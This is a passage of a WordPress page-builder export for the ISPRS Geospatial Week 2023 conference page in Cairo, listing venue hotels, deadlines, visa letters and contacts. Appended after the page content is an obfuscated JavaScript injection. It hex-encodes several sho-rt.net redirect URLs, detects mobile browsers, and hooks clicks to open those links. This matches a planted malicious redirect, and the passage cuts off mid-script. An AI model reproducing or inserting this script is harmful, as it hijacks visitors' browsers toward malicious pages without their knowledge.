Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 